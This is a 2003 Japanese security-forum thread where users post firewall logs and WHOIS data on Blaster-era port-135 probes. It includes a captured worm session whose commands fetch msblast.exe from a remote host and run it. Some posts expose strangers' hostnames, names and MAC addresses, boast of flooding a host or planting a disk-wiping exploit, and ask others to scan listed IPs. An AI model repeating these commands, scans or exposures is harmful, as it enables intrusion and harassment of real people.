03/08/12 16:11:13, MSRPC TCP port probe, kita143115.kitanet.ne.jp, 2
03/08/12 16:10:56, MSRPC TCP port probe, kita141201.kitanet.ne.jp, 2
03/08/12 15:53:20, MSRPC TCP port probe, kita143004.kitanet.ne.jp, 1

１３５より１３７のほうが多くない？
それとntoskrnl.exeって何？

てｓｔ

Network Information: [ネットワーク情報]
a. [IPネットワークアドレス] 219.111.128.0-219.111.191.0
b. [ネットワーク名] SO-NET
f. [組織名] SO-Net サービス
g. [Organization] SO-Net Service
m. [運用責任者] MK2734JP
n. [技術連絡担当者] SW314JP
n. [技術連絡担当者] YY1426JP
p. [ネームサーバ] dnss3.so-net.ne.jp
p. [ネームサーバ] dnss4.so-net.ne.jp
p. [ネームサーバ] dnss5.so-net.ne.jp
p. [ネームサーバ] dnss6.so-net.ne.jp
p. [ネームサーバ] dnss7.so-net.ne.jp
y. [通知アドレス] [email protected]
y. [通知アドレス] [email protected]
[割当年月日] 2002/08/09
[返却年月日]
[最終更新] 2003/08/12 15:32:15 (JST)
[email protected]

>>678
ＷｉｎＮＴを起動する際に必要なファイルの１つだよ
結構重要なファイルなんだけど・・・・もしかして、やられた？

>>681
やられたのかは分からないけど、GUi%GUICONFIG#SRULE@ADVRULECONFIG#NORMAL_105
とかって、送信しようとしてるけど何で？

本日２度目
こっちにも晒し

IP Address:211.120.164.129
Network:Ikeda Multi Media Co.Ltd
Location:Ikeda. Japan
Node Name:zapd378a481.zaq.ne.jp

>>682
あまり詳しくないのでチカラになれません、ごめんね
でも、普通送信したりする必要のないファイルだから
ちょっとアヤシイんじゃないかなぁ
詳しい人、Ｈｅｌｐ求む

2003/08/13 4:33:11通信の要求64.71.177.66TCP(1199)
2003/08/13 4:31:11通信の要求64.71.177.66TCP(1199)
2003/08/13 4:29:11通信の要求64.71.177.66TCP(1199)
2003/08/13 4:27:11通信の要求64.71.177.66TCP(1199)
2003/08/13 4:25:11通信の要求64.71.177.66TCP(1199)
2003/08/13 4:23:11通信の要求64.71.177.66TCP(1199)
2003/08/13 4:21:11通信の要求64.71.177.66TCP(1199)
2003/08/13 4:19:11通信の要求64.71.177.66TCP(1199)

誰か殺して

name: www.hakusuisha.co.jp
Address: 219.109.220.132

tcp135番への攻撃。

キバseven アタックがうざい。氏ね。ったく。プロクシ変えてもかわんねえ。
なんでだ？

>686
それwin2000だね

>>686
Blastertだろ。

☆★☆★　海外サイトだから安心無修正　★☆★☆
http://upbbs.s2.x-beat.com/linkvp/linkvp.html
☆★☆★　本気汁丸出しのお○○こが！　★☆★☆
http://upbbs.s2.x-beat.com/linkvp/linkvp.html
☆★☆★　２日間無料丸見え体験実施中　★☆★☆
http://upbbs.s2.x-beat.com/linkvp/linkvp.html

　↑　↑　↑
これって２日間ダウンロードしまくって
そのあと解約すれば全然タダじゃん？

210.138.60.216
>>394でもｶﾞｲｼｭﾂの様だがUZEEEEEEEEEEEEEEEEEEEEEEEEEE

Network Information: [ネットワーク情報]
a. [IPネットワークアドレス] 210.138.60.0
b. [ネットワーク名] IIJNET
f. [組織名] IIJ インターネット
g. [Organization] IIJ Internet
m. [運用責任者] TM003JP
n. [技術連絡担当者] JY018JP
p. [ネームサーバ] dns-b.iij.ad.jp
p. [ネームサーバ] dns-c.iij.ad.jp
y. [通知アドレス] [email protected]

プロバのwhoisを晒すヤシが理解できない
何か意味があるのだろうか

>>692
同意。
次は、ｽﾚﾀｲ変えたほうがいいね。

はっきりいっとくが
ここにIPさらしてるやつほうが馬鹿だからな
だいち個人を狙うハカーなぞそうそういない
このスレで警察のIPとか軍のIP晒してる馬鹿がいるかもしれない
そしてこのスレを見たハカー気取りがそのIPに攻撃始めるかもしれない
迷惑極まりない

そうそういないけど、個人のサーバーがspamの踏み台に使われてるのはかなり迷惑

192.168.1.11
whoisでも逆引き出来ないのだけど、かなり凶悪なクラッカーかな？

>>696
ここは釣り堀じゃないんですが。

>>696
whoisすると
Samba_Mitiko.home.linuxでした

61.121.100.27
61.121.100.20

>>696
漏れはcorega.homeでした

61.197.60.71[pl327.nas921.akita.nttpc.ne.jp]
いいかげんうざいです。早く死んでください。

202.229.198.199:80

未使用ﾎﾟｰﾄ遮断機能が通信を遮断しました｡ 詳細:
ｲﾝﾊﾞｳﾝﾄﾞ TCP 接続
ﾘﾓｰﾄｱﾄﾞﾚｽ､ ﾛｰｶﾙｻｰﾋﾞｽは 211.108.51.147,epmap(135)

最近こういうの多すぎ。１３５ポートばっかり狙ってる。

IPアドレス 24.79.161.91
ホスト名 h24-79-161-91.wp.shawcable.net

　　　 (⌒V⌒)
　　　│ ＾ ＾ │＜これからも僕を応援して下さいね（＾＾）。
　　⊂|　　　　|つ
　　　（＿）（＿）　　　　　　　　　　　　　　　　　　　　　　山崎パン

IP: 61.205.186.155
DNS: zaq3dcdba9b.zaq.ne.jp
Node: VAIO上村
Group: WORKGROUP
NetBIOS: ADMINISTRATOR
MAC: 00104BA1AC0F

IP: 61.205.168.248
Node: KAPPA3
Group: （有）なつき
NetBIOS: __MSBROWSE__
MAC: 000A7905EB26
DNS: zaq3dcda8f8.zaq.ne.jp

IP: 219.162.27.248
Node: スーパーけんた
NetBIOS: OWNER
Group: DATA
MAC: 005345000000
DNS: p6248-ip02niigatani.niigata.ocn.ne.jp

24.34.138.183[h00010323315e.ne.client2.attbi.com]
今日は2回もトロイの攻撃があったよ。
しかもね、一回目は米国で二回目は英語わからないから
国名読めなかったけどヨーロッパだったよ。
毎日最低1回はトロイの警告が出るのはなんでだろう？
しかも全部国内じゃなくて外国だよ。
毎日攻撃されてちゃ身が持たないよ。(´Д⊂ｸﾞｽﾝ

TCP SYN FLOOD 64.246.54.70 2003/08/15 16:50:46 - 2003/08/15 17:01:39 11hit
ポートスキャン 64.246.54.70 2003/08/15 16:54:37 - 2003/08/15 16:57:46 8hit

219.53.92.20　ウザすぎ！！

>>685
恥晒すな
それはpc.2ch.net

219.162.120.149
こいつうぜえ

こんなん来ました。ブラスター系

## client addr=61.13.57.225, port=55570
## hostname : c225.h061013057.is.net.tw
Location: +0 +4 +8 +C /0123456789ABCDEF
00000000: 74667470 202d6920 36312e31 332e3537 /tftp -i 61.13.57
00000010: 2e323235 20474554 206d7362 6c617374 /.225 GET msblast
00000020: 2e657865 0a /.exe.
Location: +0 +4 +8 +C /0123456789ABCDEF
00000000: 73746172 74206d73 626c6173 742e6578 /start msblast.ex
00000010: 650a /e.
Location: +0 +4 +8 +C /0123456789ABCDEF
00000000: 6d73626c 6173742e 6578650a /msblast.exe.

あらら、崩れまくり。。。

みんなどの解析結果サラ支店の？
ルーター？ＦＷ？
うちっとこのＦＷコピペできなくて不便

FWにport 135,4444を待ち受ける偽サーバを置いておくと
コネクトしてくるので面白い。

アタッカーのIPを晒すとかってスレを立てておくと
馬鹿が書き込んでくるので面白い。

確かに。>>1のような八が沢山いて面白い。

私はここに書き込んでいる方々のようにアタッカーのIPを調べる方法を知りません。
FWのログに残っているのは踏み台やウイルスに感染したコンピュータのIPばかりです。
アタッカーのIPを調べたいので私にも調べ方を教えてください。

>>720
> 私はここに書き込んでいる方々のようにアタッカーのIPを調べる方法を知りません。
アタッカーじゃなくて、ほとんどはゴミバケツなんだけどね

p6177-ipad02osakakita.osaka.ocn.ne.jp
こいつうざいからピング10時間ぐらいしてます

( ´_ゝ`)ﾌｰﾝ

N.Koreaからトロイの攻撃来襲記念ぱぴぽ

IP: 211.229.14.227
Network:POHANG NODE
Location:Pohang Korea
netname:KORNET-XDSL-POHANG.KR
descr:POHANG NODE
descr:135-19 DAEDODONG NAMKU POHANGSI
descr:KYONGBUG
descr:790-140
country:KR
admin-c:GP1604-KR

ノートンのvisual trackingではＮ．ＫＯＲＥＡだったけど
地図見たら韓国だった。失礼ｦﾊﾞ。

昨夜あたりから、やたらこんなのが来てるんですが　亜種関係ですか？
それか串サイトでもアドレス晒されたのかと思うのですが。
68.161.126.225 - - [19/Aug/2003:07:49:01 +0000] "GET / HTTP/1.1" 200 921 "-" "Mo
zilla/4.0 (compatible; MSIE 5.5; Windows 98)"
61.144.248.165 - - [19/Aug/2003:07:58:51 +0000] "GET / HTTP/1.1" 200 921 "-" "Mo
zilla/4.0 (compatible; MSIE 5.5; Windows 98)"
61.240.246.65 - - [19/Aug/2003:08:08:11 +0000] "GET / HTTP/1.1" 200 921 "-" "Moz
illa/4.0 (compatible; MSIE 5.5; Windows 98)"
211.186.104.192 - - [19/Aug/2003:08:14:48 +0000] "GET / HTTP/1.1" 200 921 "-" "M
ozilla/4.0 (compatible; MSIE 5.5; Windows 98)"
207.172.46.73 - - [19/Aug/2003:08:16:57 +0000] "GET / HTTP/1.1" 200 921 "-" "Moz
illa/4.0 (compatible; MSIE 5.5; Windows 98)"

昨夜よりも前には、ほとんどこんなログは無かったのですがどうですか？
教えてください

Network Information: [ネットワーク情報]
a. [IPネットワークアドレス] 210.148.128.0-210.148.135.0
b. [ネットワーク名] PPP-EXCITE
f. [組織名] エキサイト株式会社
g. [Organization] Excite Japan Co., Ltd.
m. [運用責任者] EK861JP
n. [技術連絡担当者] JF254JP
p. [ネームサーバ] ns00.cdn-japan.com
p. [ネームサーバ] ns01.cdn-japan.com
y. [通知アドレス] [email protected]
[割当年月日] 2002/07/19
[返却年月日]
[最終更新] 2003/07/24 15:26:06 (JST)
[email protected]

IP: 219.164.19.225
Node: 島徹彰
Group: WORKGROUP
NetBIOS: 島徹彰1
MAC: 444553547777
DNS: m019225.ap.plala.or.jp

IP: 220.97.224.208
Node: 大東園
Group: WORKGROUP
NetBIOS: WORKGROUP
MAC: 444553547777
DNS: p2208-ipbf08fukuokachu.fukuoka.ocn.ne.jp

IP: 220.97.36.78
Node: 水野
Group: FORTUNE
NetBIOS: 水野1
MAC: 005345000000
DNS: p3078-ipad71marunouchi.tokyo.ocn.ne.jp

IP: 219.162.170.198
Node: 三高商運
Group: WORKGROUP
NetBIOS: ADMINISTRATOR
MAC: 444553547777
DNS: p5198-ipad25osakakita.osaka.ocn.ne.jp

IP: 218.43.212.191
Node: 岐阜営業所
Group: WORKGROUP
NetBIOS: WORKGROUP
MAC: 444553547777
DNS: p1191-ipad02gifu.gifu.ocn.ne.jp

IPを晒すのって法的に問題ないの？
逮捕された人が、晒してある踏み台を使った場合とか。
誰か詳しい人教えてください。

踏み台にされる側にも問題があるわけだが、
晒すことには問題ありそうだな。

それに晒されてるＩＰはほとんど
ウイルス感染してるマシンであり
ウイルスが勝手にアタックしているものが
大半を占めていると思うに一票

>>734
初耳です、jpnicは違法ですか？
さらされて困るIPなら　そもそも不用意に無許可でアクセスするほうが悪くないか？
勝手にアクセスしてきたIPに気遣か？

>>733
問題ないです。

今日自分の家に、だれだれと名乗る、どこどこの方から来ましたと名乗る
訪問者がいて、そのことを公表するなというほうがおかしい。

別にこちからか募集して訪問したことの秘密を守るとか公言しているわけではないだろ。

03.8.21 22:03:01拒否不明135TCP220.145.235.224ntfksm032224.fksm.nt.adsl.ppp.infoweb.ne.jp
03.8.21 22:03:00拒否不明135TCP220.145.235.224ntfksm032224.fksm.nt.adsl.ppp.infoweb.ne.jp
03.8.21 22:02:34拒否不明135TCP220.144.176.143fla1aao143.myg.mesh.ad.jp
03.8.21 22:02:33拒否不明135TCP220.144.176.143fla1aao143.myg.mesh.ad.jp
03.8.21 22:00:36拒否不明135TCP220.145.240.53nttcgi031053.tcgi.nt.adsl.ppp.infoweb.ne.jp
03.8.21 22:00:29拒否不明135TCP220.145.240.53nttcgi031053.tcgi.nt.adsl.ppp.infoweb.ne.jp
03.8.21 21:59:54拒否不明135TCP220.145.162.51kihn008051.catv.ppp.infoweb.ne.jp
03.8.21 21:59:11拒否不明135TCP220.145.107.192nttcgi034192.tcgi.nt.adsl.ppp.infoweb.ne.jp
03.8.21 21:59:04拒否不明135TCP220.145.107.192nttcgi034192.tcgi.nt.adsl.ppp.infoweb.ne.jp
03.8.21 21:58:45拒否不明135TCP220.145.44.54ntnigt037054.nigt.nt.adsl.ppp.infoweb.ne.jp
03.8.21 21:58:44拒否不明135TCP220.145.44.54ntnigt037054.nigt.nt.adsl.ppp.infoweb.ne.jp
03.8.21 21:54:34拒否不明135TCP220.145.94.221

ここでIPアドレス晒しても意味無いのは確かだが。
自分でISPに言えよ。

>739
ｲﾔ､漏ﾚが改良したEXPLOITで､次回起動時ﾌｫｰﾏｯﾄするﾁﾞｮ!.bat流し込んでﾚｼﾞｽﾄﾘ
改変しとくから大丈夫。

それより、誰か上のﾘｽﾄのﾘﾓﾎ宛てport135でｽｷｬﾇしてopenしてるﾔｼだけﾛｸﾞ貼り出してｸﾚ。頼んだｿﾞ!

>>733
不正ｱｸｾｽしてくる方が悪い。

2003/08/22 0:06:16通信の要求211.10.246.146TCP(1038)
2003/08/22 0:04:16通信の要求211.10.246.146TCP(1038)
2003/08/22 0:02:56通信の要求206.112.112.5TCP(1089)
2003/08/22 0:02:16通信の要求211.10.246.146TCP(1038)
2003/08/22 0:01:39通信の要求211.10.246.154TCP(1039)
2003/08/22 0:00:57通信の要求206.112.112.5TCP(1089)
2003/08/22 0:00:16通信の要求211.10.246.146TCP(1038)
2003/08/21 23:59:39通信の要求211.10.246.154TCP(1039)
2003/08/21 23:58:57通信の要求206.112.112.5TCP(1089)
2003/08/21 23:58:16通信の要求211.10.246.146TCP(1038)
2003/08/21 23:57:39通信の要求211.10.246.154TCP(1039)

>>742
感染してる・・・と書いてみるテスト

ここ数日、icmp echoリクエストがいろんな所から大量に届いている(一分間に10〜100前後)のですが、
これは一体なんでしょうか？　

↓ちなみについさっきのログ
00:18:49.521813 xxx-51-52-181.nrp1feld.roc.ny.frontiernet.net > xxx.xxx.xxx.xxx: icmp: echo request
00:19:01.018292 xxx.128.153.146 > xxx.xxx.xxx.xxx: icmp: echo request
00:19:01.467896 xxx.25.145.45 > xxx.xxx.xxx.xxx: icmp: echo request
00:19:11.606740 xxxl-151-205-121-174.ny325.east.verizon.net > xxx.xxx.xxx.xxx: icmp: echo request
00:19:19.372920 xxxitm065021.sitm.nt.adsl.ppp.infoweb.ne.jp > xxx.xxx.xxx.xxx: icmp: echo request
00:20:25.440436 xxx.191.13.174 > xxx.xxx.xxx.xxx: icmp: echo request
00:21:55.131985 xxxich014077.aich.nt.isdn.ppp.infoweb.ne.jp > xxx.xxx.xxx.xxx: icmp: echo request

>>744
聞くところに因るとblaster.Dのせいらしいです。

でも実は、本日密かに開催されてる全国ｽｷｬﾝ祭りの一環だと私は睨んでますが。

>>745
「全国」って日本全国ですか？エクアドルとかザンビアとかからもきてるんで、そっちじゃないとは
おもいますが…
無羅星Dってたんに135をつつくだけかと思ったらICMPもつつくんですね。勉強になりました。
ありがとうございました。
ちなみにicmp echo reqは特別な場合以外は全てルーターではじいているのでうちは無問題です。
ちなみに、一応リクエストしたノードに対してはhostアンリーチブルを返すようにしてますが、
これは無駄でしょうか？

あーでもこういう逆引き不可な似たようなアドレスのが殆ど同時に連続してくるってのも怪しい気がするな…

00:41:23.859785 61.128.175.207 > xxx.xxx.xxx.xxx: icmp: echo request
00:41:43.520952 61.144.83.115 > xxx.xxx.xxx.xxx: icmp: echo request
00:42:31.201191 61.128.210.219 > xxx.xxx.xxx.xxx: icmp: echo request
00:42:31.962711 61.241.149.131 > xxx.xxx.xxx.xxx: icmp: echo request
00:42:37.387965 61.174.160.13 > xxx.xxx.xxx.xxx: icmp: echo request
00:43:03.775087 61.128.193.203 > xxx.xxx.xxx.xxx: icmp: echo request

>>746
ｲﾔ､今回は海外の招待選手も居るらしいです。

どうなんでしょう。。>hostアンリーチブル
まぁ、blast.Dさんがｱﾝﾘｰﾁﾌﾞﾙをちゃんと認識して｢ﾔｰﾒﾀ､次逝ｺ!｣くれるように書かれて居れば
別ですが。

>>743
何に感染しているの？

>>748
なるほでぉ。
いつも寝る前はルーターをシャットダウンしているんですが、今夜はつけっぱなしにして
フィルターにムフフな設定をして、cronとかにもムフフなことを書き込んでやりますた。
明日の朝ログを見るのが楽しみ。便乗さん、いらっしゃい〜

ttp://ip.tosp.co.jp/i.asp?i=MOONtoSTAR
アタッカーって・・・こんな人達ですか？

FLA1Aae054.smn.mesh.ad.jp
NCCa1Aac194.myg.mesh.ad.jp

ここでＩＰを干している香具師は、勘違いしてないか？

日付: 2003/08/23 時刻: 6:58:27
ｱﾄﾞﾚｽ 213.6.52.26 からの不正侵入の試みを規則 Backdoor/SubSeven ﾄﾛｲの木馬のﾃﾞﾌｫﾙﾄ遮断 によって検出しました｡
以降のｱｸｾｽを 30 分間遮断しました｡

2003/08/23 14:35:17通信の要求211.10.246.144TCP(1302)
2003/08/23 14:33:17通信の要求211.10.246.144TCP(1302)
2003/08/23 14:33:01通信の要求211.10.246.160TCP(1293)
2003/08/23 14:31:17通信の要求211.10.246.144TCP(1302)
2003/08/23 14:31:01通信の要求211.10.246.160TCP(1293)
2003/08/23 14:29:17通信の要求211.10.246.144TCP(1302)
2003/08/23 14:29:01通信の要求211.10.246.160TCP(1293)
2003/08/23 14:27:17通信の要求211.10.246.144TCP(1302)
2003/08/23 14:27:01通信の要求211.10.246.160TCP(1293)
2003/08/23 14:25:17通信の要求211.10.246.144TCP(1302)
2003/08/23 14:25:01通信の要求211.10.246.160TCP(1293)
2003/08/23 14:24:01通信の要求211.10.246.146TCP(1234)
2003/08/23 14:23:17通信の要求211.10.246.144TCP(1302)
2003/08/23 14:23:01通信の要求211.10.246.160TCP(1293)
2003/08/23 14:22:01通信の要求211.10.246.146TCP(1234)
2003/08/23 14:20:01通信の要求211.10.246.146TCP(1234)
2003/08/23 14:18:01通信の要求211.10.246.146TCP(1234)
2003/08/23 14:16:01通信の要求211.10.246.146TCP(1234)
2003/08/23 14:14:01通信の要求211.10.246.146TCP(1234)
2003/08/23 14:12:02通信の要求211.10.246.146TCP(1234)

>>755
そこから本気でアタックされたら君はひとたまりもないよ
俺ならISPとNIC変える

漏れだったらLANケーブル抜いて寝る（ｗ

さきほどマイクロソフトからでした（トロイ）
65.54.240.61

OrgName: Microsoft Corp
OrgID: MSFT
Address: One Microsoft Way
City: Redmond
StateProv: WA
PostalCode: 98052
Country: US

NetRange: 65.52.0.0 - 65.55.255.255
CIDR: 65.52.0.0/14
NetName: MICROSOFT-1BLK
NetHandle: NET-65-52-0-0-1
Parent: NET-65-0-0-0-0
NetType: Direct Assignment
NameServer: DNS1.CP.MSFT.NET
NameServer: DNS2.CP.MSFT.NET
NameServer: DNS1.TK.MSFT.NET
NameServer: DNS1.DC.MSFT.NET
NameServer: DNS1.SJ.MSFT.NET
Comment:
RegDate: 2001-02-14
Updated: 2002-12-05

80.139.160.66

漏れを攻撃するやつはドイツのどいつじゃ？

218.221.219.234

木馬野郎

やだなー。カナダのオタたちがバックドアなげてくるよー
家のノートン先生も怒りっぱなし・・・・・
しかもたまにIP偽造してる人達まで・・・（藁

被害妄想はやめれ。
たいていバカプログラムに感染するようなアフォPCから
無差別に送られてくるだけだ。
あんたらも（あんたらの言う）攻撃仕掛けてるかもしれんのに。

つーか1がろくに調べんと書いてたのには…
そりゃ一応ウィルスからアタックされてるが。

>>753
禿同。

よくわかっていないのでKerioでaskにしてるんだけど、
さっき、(なんとか).army.milからポート99になんか来たので慌ててDenyした
こういうのって詐称？

ちなみに
ttp://www.army.mil/
落ちてます？pingも帰ってこない

訂正：99から来たんだったかも・・
TCP/IP Kernel Driver向けだったはず・・
ログが残ってなくてヘタレですみません。

郵便局の口座番号から住所や名前ってわかりますかねー？
そいつにある事情(だいたい予想はつくと思いますが)により
五万円騙しとられたみたいな感じなんです。

ttp://www.zdnet.co.jp/enterprise/0308/22/epn04.html

＞複数の通信社が伝えるところでは、国防総省と軍部でも、Sobig.FとNachiの両方の感染が起きている

もしかしてこれですかな。
つーか誰か反応欲しかった。。


>>765
口座名義はわかるだろ。
詐欺なら警察へ。

>>766
SobigFの解説をちゃんと読め

YBBは全部拒否に登録してみた。

OrgName: Comcast Cable Communications Holdings, Inc
OrgID: CCCH-3
Address: 3 Executive Campus
Address: 5th Campus
City: Cherry Hill
StateProv: NJ
PostalCode: 08002
Country: US

NetRange: 24.125.0.0 - 24.125.127.255
CIDR: 24.125.0.0/17
NetName: CCCH3-20
NetHandle: NET-24-125-0-0-1
Parent: NET-24-0-0-0-0
NetType: Direct Allocation
NameServer: NS4.ATTBB.NET
NameServer: NS5.ATTBB.NET
NameServer: NS6.ATTBB.NET
Comment:
RegDate:
Updated: 2003-08-19

OrgAbuseHandle: NAPO-ARIN
OrgAbuseName: Network Abuse and Policy Observance
OrgAbusePhone: +1-856-317-7272
OrgAbuseEmail: [email protected]

OrgTechHandle: IC161-ARIN
OrgTechName: Comcast Cable Communications, Inc.
OrgTechPhone: +1-856-317-7300
OrgTechEmail: [email protected]

219.182.184.1

yahooBB219182184001.bbtec.net

ハッカーの方居ましたら宜しく。
ＨＤ　ＭＢ乗せ変えなんであぼ〜んＯＫです。
ドコまで出来るの？

ここは私怨厨房の肥溜めです。

61.203.207.171

2003/08/29 5:53:39通信の要求211.10.246.154TCP(1050)
2003/08/29 5:51:39通信の要求211.10.246.154TCP(1050)
2003/08/29 5:49:39通信の要求211.10.246.154TCP(1050)
2003/08/29 5:47:39通信の要求211.10.246.154TCP(1050)

本当にしつこい

206.112.112.70
　リアルタイムでやられてる者です。どうにかなんない？基地外

>>774
俺はお前が基地外だいと思う

216.17.74.50:18800

>>775
なんで？これって実は何も危険のないアクセスなの？だとしたらたしかに
俺はバカだ。(笑

206.112.112.70
死ねや、カスが。

210.190.142.73
本当にしつこい。どっかいけ。

あぼーん

わずか20分の間に1000回を越えるアタック。
許せない。
65-70-160-129.tklaw.com

ついに2000回を越えたわけだが・・・
コイツ一つだけでログが膨大に・・・

同時進行で
HSE-QuebecCity-ppp84103.qc.sympatico.caも1400を超えるアタック。
もう寝よ・・・。

セキュ板の華やねここは

時間, イベント, 侵入者, 侵入者の IP, 発信元ポート, 宛先ポート, カウント
2003/09/03 13:20:39, DNS_NonInternet, 61.25.250.14, 61.25.250.14, 53, 4429, 2337
2003/09/03 13:20:42, DNS_Format_String, 61-25-250-14.home.ne.jp, 61.25.250.14, 53, 4429, 271
2003/09/03 13:20:44, DNS_Format_String, 61-25-250-14.home.ne.jp, 61.25.250.14, 53, 4429, 261
2003/09/03 13:20:47, DNS_Format_String, 61-25-250-14.home.ne.jp, 61.25.250.14, 53, 4429, 847
2003/09/03 13:20:47, DNS_Hostname_Overflow, 61-25-250-14.home.ne.jp, 61.25.250.14, 53, 4429, 367
2003/09/03 13:20:47, DNS_NonInternet, 61-25-250-14.home.ne.jp, 61.25.250.14, 53, 4429, 26162
2003/09/03 13:20:54, DNS_NonInternet, 61-25-250-14.home.ne.jp, 61.25.250.14, 53, 4429, 8429
2003/09/03 13:20:57, DNS_Format_String, 61-25-250-14.home.ne.jp, 61.25.250.14, 53, 4429, 298
2003/09/03 13:20:58, DNS_Format_String, 61-25-250-14.home.ne.jp, 61.25.250.14, 53, 4429, 419
2003/09/03 13:21:01, DNS_Format_String, 61-25-250-14.home.ne.jp, 61.25.250.14, 53, 4429, 792
2003/09/03 13:21:01, DNS_Hostname_Overflow, 61-25-250-14.home.ne.jp, 61.25.250.14, 53, 4429, 380
2003/09/03 13:21:01, DNS_NonInternet, 61-25-250-14.home.ne.jp, 61.25.250.14, 53, 4429, 25228
2003/09/03 13:26:29, DNS_NonInternet, 61-25-250-14.home.ne.jp, 61.25.250.14, 53, 4495, 892

通報しますた

169.254.0.8 からNBT 又は Microsoft-DS パケットのルーティング UDPポート:138

で、１分間に１００を越えるログが…


それが納まったら１３５に猛然とアタック〜。
ログが溜まりまくり〜ﾎﾎﾎﾎヽ（ ´▽｀ ）ﾉｵﾈｰｻﾝｵﾄﾞｯﾁｬｳﾜ♪

gateway.zd-mb.si しつこい。
たった15分間で950を超えるアタック。

あーもう。

踏み台やら串使って、アタックしてきたIPから、
どうやって生IPが特定できるのでしょうか？
IPから追跡しても相当な数の踏み台を介してアタックされるので…。
よければ方法を教えてください。
そもそもこれらどこのデータ張ってるんですか？

z30.219-103-217.ppp.wakwak.ne.jp
p3119-ipbf05marunouchi.tokyo.ocn.ne.jp
p2133-ipadfx01maru.tokyo.ocn.ne.jp
SMNfi-01p1-41.ppp11.odn.ad.jp
host-B098.kakita.ne.jp

もーうざい

>>789
この情報どこで調べたの？

>>789
まさかfirewallじゃないよね？

あぼーん

時間, イベント, 侵入者, 侵入者の IP, 発信元ポート, 宛先ポート, カウント
2003/09/05 10:14:50, DNS_Hostname_Overflow, 61-25-250-14.home.ne.jp, 61.25.250.14, 53, 4406, 24
2003/09/05 10:14:51, DNS_Format_String, 61-25-250-14.home.ne.jp, 61.25.250.14, 53, 4406, 25
2003/09/05 10:14:51, DNS_Hostname_Overflow, 61-25-250-14.home.ne.jp, 61.25.250.14, 53, 4406, 12
2003/09/05 10:14:52, DNS_Format_String, 61-25-250-14.home.ne.jp, 61.25.250.14, 53, 4406, 10
2003/09/05 10:14:52, DNS_Hostname_Overflow, 61-25-250-14.home.ne.jp, 61.25.250.14, 53, 4406, 13
2003/09/05 10:14:52, DNS_Hostname_Overflow, 61-25-250-14.home.ne.jp, 61.25.250.14, 53, 4406, 48
2003/09/05 10:14:52, DNS_Format_String, 61-25-250-14.home.ne.jp, 61.25.250.14, 53, 4406, 59
2003/09/05 10:14:52, DNS_Format_String, 61-25-250-14.home.ne.jp, 61.25.250.14, 53, 4406, 5
2003/09/05 10:14:52, DNS_Hostname_Overflow, 61-25-250-14.home.ne.jp, 61.25.250.14, 53, 4406, 5
2003/09/05 10:15:02, DNS_Format_String, 61-25-250-14.home.ne.jp, 61.25.250.14, 53, 4406, 1
2003/09/05 10:15:04, DNS_Hostname_Overflow, 61-25-250-14.home.ne.jp, 61.25.250.14, 53, 4406, 1
2003/09/05 10:15:07, DNS_NonInternet, 61-25-250-14.home.ne.jp, 61.25.250.14, 53, 4406, 1921

またきた
氏ね

　カウント, 時間, イベント, 侵入者, 侵入者の IP, 宛先ポート, 発信元ポート
　5, 2003/09/05 14:01:44, ICMP_Subnet_Mask_Request, pl022.nas931.m-hiroshima.nttpc.ne.j○, 61.197.87.22, 0, 17
　2, 2003/09/05 14:01:34, UDP_Probe_Other, pl022.nas931.m-hiroshima.nttpc.ne.j○, 61.197.87.22, 51294, 69
●1159, 2003/09/05 13:00:37, TCP_Port_Scan, pl022.nas931.m-hiroshima.nttpc.ne.j○, 61.197.87.22, 539, 4534

誰かこのＤＱＮを止めてくれ

アタッカーって何のためにそんな（１分間に１００ですか？）ことやるんですかね
余程の暇人かと。

アタッカーがされたかどうかのログはどこで見れるのですか？

1 192.168.1.1 0 ms
3 10.26.1.67 16 ms
4 10.26.253.20 15 ms
5 10.26.1.121 16 ms
6 10.0.26.129 15 ms
7 10.9.17.145 203 ms
8 202.213.198.169 16 ms
9 202.213.193.82 31 ms
10 202.213.193.188 31 ms
11 61.211.63.132 16 ms
12 61.211.63.70 32 ms
13 219.98.13.95 46 ms

ルート見ててる（´_ゝ`）

>>758
Microsoftにアタックされるなんて、あなた何したんですか？

219.106.178.149

135 共有ポートにしつこく毎日やってくる

殺してください

８００

2003/09/07 00:37:06 66.220.17.151:80 (151.17.220.66.in-addr.arpa) xxx.xxx.xxx.xxx:1306 ポート 1306 (TCP)

毎日〜IP変えてがんばるなぁ、こいつ。

Sep 6 23:59:58 SRC=66.117.15.44 PROTO=TCP SPT=2960 DPT=8080 WINDOW=65535 RES=0x00 SYN URGP=0
Sep 7 00:00:01 SRC=66.117.15.44 PROTO=TCP SPT=2960 DPT=8080 WINDOW=65535 RES=0x00 SYN URGP=0
Sep 7 00:00:08 SRC=66.117.15.44 PROTO=TCP SPT=2960 DPT=8080 WINDOW=65535 RES=0x00 SYN URGP=0
Sep 7 00:00:26 SRC=66.117.15.44 PROTO=TCP SPT=4707 DPT=8080 WINDOW=65535 RES=0x00 SYN URGP=0
Sep 7 00:00:29 SRC=66.117.15.44 PROTO=TCP SPT=4707 DPT=8080 WINDOW=65535 RES=0x00 SYN URGP=0
Sep 7 00:00:36 SRC=66.117.15.44 PROTO=TCP SPT=4707 DPT=8080 WINDOW=65535 RES=0x00 SYN URGP=0
Sep 7 00:00:54 SRC=66.117.15.44 PROTO=TCP SPT=2465 DPT=8080 WINDOW=65535 RES=0x00 SYN URGP=0
Sep 7 00:00:58 SRC=66.117.15.44 PROTO=TCP SPT=2465 DPT=8080 WINDOW=65535 RES=0x00 SYN URGP=0
Sep 7 00:01:04 SRC=66.117.15.44 PROTO=TCP SPT=2465 DPT=8080 WINDOW=65535 RES=0x00 SYN URGP=0
Sep 7 00:53:15 SRC=66.117.15.44 PROTO=TCP SPT=3501 DPT=8080 WINDOW=65535 RES=0x00 SYN URGP=0
Sep 7 00:53:18 SRC=66.117.15.44 PROTO=TCP SPT=3501 DPT=8080 WINDOW=65535 RES=0x00 SYN URGP=0
Sep 7 00:53:24 SRC=66.117.15.44 PROTO=TCP SPT=3501 DPT=8080 WINDOW=65535 RES=0x00 SYN URGP=0
Sep 7 00:53:47 SRC=66.117.15.44 PROTO=TCP SPT=4723 DPT=8080 WINDOW=65535 RES=0x00 SYN URGP=0
Sep 7 00:53:50 SRC=66.117.15.44 PROTO=TCP SPT=4723 DPT=8080 WINDOW=65535 RES=0x00 SYN URGP=0
Sep 7 00:53:56 SRC=66.117.15.44 PROTO=TCP SPT=4723 DPT=8080 WINDOW=65535 RES=0x00 SYN URGP=0
Sep 7 00:54:14 SRC=66.117.15.44 PROTO=TCP SPT=1693 DPT=8080 WINDOW=65535 RES=0x00 SYN URGP=0
Sep 7 00:54:17 SRC=66.117.15.44 PROTO=TCP SPT=1693 DPT=8080 WINDOW=65535 RES=0x00 SYN URGP=0
